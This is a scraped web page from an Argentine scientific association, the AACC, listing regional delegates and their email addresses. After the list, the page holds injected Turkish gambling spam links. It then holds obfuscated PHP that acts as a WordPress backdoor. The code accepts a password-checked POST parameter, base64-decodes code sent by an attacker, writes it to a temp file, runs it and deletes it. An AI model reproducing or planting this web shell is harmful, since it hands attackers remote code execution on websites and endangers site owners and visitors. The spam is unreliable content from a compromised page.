La AACC tiene carácter federal, con delegaciones en las localidades que son sede de grupos de investigación en el área.

BUENOS AIRES
Ángel Elgier: amelgier@gmail.com
Matías Serafini: matiasserafini@gmail.com
Juan Pablo Barreyro: jpbarreyro@gmail.com

CÓRDOBA
Macarena Fernández: macarenasoledadfernandez@gmail.com
Pablo Correa: pablocorrea@unc.edu.ar

ENTRE RÍOS y SANTA FE
Lucas Marcelo Rodríguez: lucasmarcelorodriguez@gmail.com
Cinthia Milena Balabanian: cinthia.balabanian@gmail.com

MAR DEL PLATA
Leticia Vivas: leluvivas@gmail.com
Fernando Poó: poo.fernando@gmail.com

MENDOZA
Cecilia Moreno: cecilia429moreno@gmail.com
Jimena Arroyo: mjarroyo@uda.edu.ar

MISIONES, CHACO y CORRIENTES
Sonia Cheminsky: sochemisquy@gmail.com
Alejandra Sadaniowski: alejandrasadaniowski@hotmail.com

RÍO NEGRO
Ana Clara Ventura: ventura.ana.c@gmail.com

ROSARIO
Florencia Mareovich: mareovich@irice-conicet.gov.ar
María Agustina Tuzinkievicz: tuzinkievicz@irice-conicet.gov.ar

SAN JUAN
Luis Lucero: lic.luceroluis@gmail.com

SAN LUIS
Víctor Martínez Núñez: vamarnun@gmail.com
Verónica Fasulo: veronica.fasulo@gmail.com

NOA (SANTIAGO DEL ESTERO, LA RIOJA, JUJUY y TUCUMÁN)
Betina Lacunza: betinalacu@hotmail.com
Mariela Vendramini: licmarive@yahoo.com.ar

1xbet giriş ladesbet giriş 1xbet giriş ladesbet giriş 1xbet giriş 1xbet giriş deneme bonusu veren siteler 1xBet giriş 1xBet giriş div> if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}